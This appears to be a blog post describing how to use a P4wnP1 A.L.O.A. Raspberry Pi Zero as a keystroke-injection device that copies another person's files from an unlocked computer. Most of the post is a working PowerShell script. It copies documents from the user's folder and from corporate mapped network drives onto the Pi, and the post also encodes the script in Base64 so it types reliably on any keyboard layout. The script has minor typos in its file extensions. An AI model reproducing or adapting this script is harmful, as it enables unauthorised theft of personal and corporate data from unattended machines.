top of page

P4WNP1 a.l.o.a - Copy Mapped Drive Content to a Pi Zero

The "p4wnp1 a.l.o.a" using a Raspberry Pi Zero is perfect for getting someone else's files from an unlocked computer....

Seytonic made a great youtube video demonstrating how the Pi Zero can act as a Keyboard and execute PowerShell commands. Coming from the UK there is an issue with the keyboard mapping of the P4wnp1a a.l.o.a and '|' (pipes) dont type correctly breaking the scripts.  The mappings issue could be corrected within Kali, boring, and doesnt really help when the keyboard language could be non-uk. The alternative is to encode the script as 'Base64' removing all special characters and guarenteeing better sucess for any English based lanugage. 


The original script demo'd in the video has beed updated to include mapped drives for corporate users.


#HERE'S THE SCRIPT

#logged on user

$wh = whoami

$uName = $wh.Split("\")[1]


#Pi Zero 

$usbPath = gwmi win32_volume 

$san = $usbpath | where {$_.label -eq "sandisk"} | select name


#Copy local files to Pi 

copy-Item "C:\users\$uname\Documents\*" $san.name -Include "*.txt", "*.docx", "xlsx"


#Network mapped drives

$dr = psdrive

$fs = $dr.provider | where {$_.Name -eq "fileSystem"}

$maps = $fs[0].Drives

$first = 10


foreach ($mapin in $maps)

{

    if ($mapin.Name -ne "C")

    {

    Write-Host $mapin

    $lf = Get-Childitem $mapin.root -Recurse -Depth 1 -Include "*.txt","*.docx","*.xlxs" | Select-Object $first

    Copy-Item $lf.fullname $san.name -Force

    }

}


HERE'S IT BEING ENCODED TO BASE64

$b64 = ‘

#logged on user

$wh = whoami

$uName = $wh.Split("\")[1]


#Pi Zero 

$usbPath = gwmi win32_volume 

$san = $usbpath | where {$_.label -eq "sandisk"} | select name


#Copy local files to Pi 

copy-Item "C:\users\$uname\Documents\*" $san.name -Include "*.txt", "*.docx", "*.xlsx"


#Network mapped drives

$dr = psdrive

$fs = $dr.provider | where {$_.Name -eq "fileSystem"}

$maps = $fs[0].Drives

$first = 10


foreach ($mapin in $maps)

{

    if ($mapin.Name -ne "C")

    {

    Write-Host $mapin

    $lf = Get-Childitem $mapin.root -Recurse -Depth 1 -Include "*.txt","*.docx","*.xlxs" | Select-Object $first

    Copy-Item $lf.fullname $san.name -Force

    }

}

$gb = [System.Text.Encoding]::Unicode.GetBytes($b64)

$en =[Convert]::ToBase64String($gb)


$en | Out-File C:\users\Administrator\Desktop\encodeMApped.txt






bottom of page